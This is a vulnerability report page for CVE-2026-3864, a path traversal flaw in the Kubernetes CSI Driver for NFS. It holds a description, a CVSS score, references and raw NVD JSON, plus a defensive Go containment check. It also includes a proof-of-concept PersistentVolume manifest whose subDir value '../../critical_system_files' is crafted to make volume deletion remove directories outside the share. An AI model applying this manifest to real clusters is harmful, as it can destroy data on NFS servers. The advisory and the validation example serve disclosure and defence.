Security Vulnerability Report
CVE-2026-3864 CVSS 6.5 MEDIUM

CVE-2026-3864

Published: 2026-03-20 23:16:48
Last Modified: 2026-03-23 14:32:03

Description

A vulnerability was discovered in the Kubernetes CSI Driver for NFS where the subDir parameter in volume identifiers was insufficiently validated. Attackers with the ability to create PersistentVolumes referencing the NFS CSI driver could craft volume identifiers containing path traversal sequences (../). During volume deletion or cleanup operations, the driver could operate on unintended directories outside the intended managed path within the NFS export. This may lead to deletion or modification of directories on the NFS server.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Kubernetes CSI Driver for NFS

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: nfs-exploit-pv
spec:
  capacity:
    storage: 5Gi
  accessModes:
    - ReadWriteMany
  persistentVolumeReclaimPolicy: Delete
  csi:
    driver: nfs.csi.k8s.io
    volumeHandle: vol-exploit-01
    volumeAttributes:
      server: 192.168.1.10
      share: /export/data
      # Malicious subDir using path traversal to target parent or root
      subDir: "../../critical_system_files"
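
A containment check for the subDir handling described above, written in Go as an added example; it is not the driver's code or its actual fix, and `resolveSubDir` is a hypothetical helper. The check is lexical only and assumes no symlinks on the NFS server.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// resolveSubDir is a hypothetical helper, not csi-driver-nfs code.
// It joins an NFS share path with a caller-supplied subDir and returns an
// error unless the result is strictly inside the share, so a delete or
// cleanup routine never receives the share root or anything above it.
// The check is lexical: symlinks on the NFS server are not resolved.
func resolveSubDir(share, subDir string) (string, error) {
	base := path.Clean("/" + share)
	// path.Join cleans its result, collapsing "." and ".." segments.
	target := path.Join(base, subDir)
	if target == base {
		return "", fmt.Errorf("subDir %q resolves to the share root", subDir)
	}
	// Compare against base plus a separator so that a sibling such as
	// /export/data2 is not accepted as being "under" /export/data.
	prefix := strings.TrimSuffix(base, "/") + "/"
	if !strings.HasPrefix(target, prefix) {
		return "", fmt.Errorf("subDir %q escapes %q (resolves to %q)", subDir, base, target)
	}
	return target, nil
}

func main() {
	// share and the first subDir are the values from the manifest on this
	// page; the remaining subDir values are constructed for illustration.
	share := "/export/data"
	for _, sd := range []string{
		"../../critical_system_files",
		"pvc-1234",
		"a/../../data2/x",
		"..",
	} {
		if p, err := resolveSubDir(share, sd); err != nil {
			fmt.Println("REJECT:", err)
		} else {
			fmt.Println("ok:    ", p)
		}
	}
}
```

A subDir such as `a/../b` still passes because it resolves inside the share; a stricter policy can reject any `..` segment outright.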

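References

https://github.com/kubernetes/kubernetes/issues/137797
https://groups.google.com/g/kubernetes-security-announce/c/i4ZKN9VLcUE
http://www.openwall.com/lists/oss-security/2026/03/17/1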

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3864", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:48.303", "lastModified": "2026-03-23T14:32:02.800", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was discovered in the Kubernetes CSI Driver for NFS where the subDir parameter in volume identifiers was insufficiently validated. Attackers with the ability to create PersistentVolumes referencing the NFS CSI driver could craft volume identifiers containing path traversal sequences (../). During volume deletion or cleanup operations, the driver could operate on unintended directories outside the intended managed path within the NFS export. This may lead to deletion or modification of directories on the NFS server."}, {"lang": "es", "value": "Se descubrió una vulnerabilidad en el controlador CSI de Kubernetes para NFS donde el parámetro subDir en los identificadores de volumen no se validaba suficientemente. Atacantes con la capacidad de crear PersistentVolumes que hacen referencia al controlador CSI de NFS podrían crear identificadores de volumen que contienen secuencias de salto de ruta (../). Durante las operaciones de eliminación o limpieza de volumen, el controlador podría operar en directorios no deseados fuera de la ruta gestionada prevista dentro de la exportación NFS. 
Esto podría llevar a la eliminación o modificación de directorios en el servidor NFS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/kubernetes/kubernetes/issues/137797", "source": "[email protected]"}, {"url": "https://groups.google.com/g/kubernetes-security-announce/c/i4ZKN9VLcUE", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/17/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}